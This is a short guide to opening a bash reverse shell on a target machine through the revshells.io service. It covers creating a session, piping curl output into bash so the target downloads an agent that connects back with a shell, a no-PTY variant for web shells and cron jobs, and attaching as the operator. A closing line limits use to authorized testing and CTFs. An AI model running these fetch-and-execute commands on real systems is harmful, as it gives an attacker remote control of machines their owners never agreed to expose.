Bash reverse shell with revshells.io

Instead of crafting bash -i >& /dev/tcp/... one-liners and standing up your own listener, revshells.io gives you a stable HTTPS callback URL per session. The target runs a short bootstrap script; you attach from the browser or CLI.

1. Create a session

Open revshells.io and click + New session. You get a unique session ID (UUID) and callback URLs scoped to that session.

2. Run the bash bootstrap on the target

On a Linux/macOS target with curl or wget, run (replace SESSION-ID with yours):

curl -fsSL https://revshells.io/SESSION-ID/revshell | bash

This downloads the rs-agent binary for the target platform and connects back over WebSocket with a full PTY shell when a TTY is available.

3. No TTY / restricted shells

If the target has no PTY (common in web shells or cron jobs), use command mode:

curl -fsSL https://revshells.io/SESSION-ID/nopty | bash

Output is line-based over HTTP long-poll instead of an interactive terminal.

4. Attach as operator

• Browser: open your session page on revshells.io — the terminal connects automatically.
• CLI: mint a workspace token from the hub, then rsctl attach SESSION-ID.

For authorized security testing, CTFs, and lab environments only.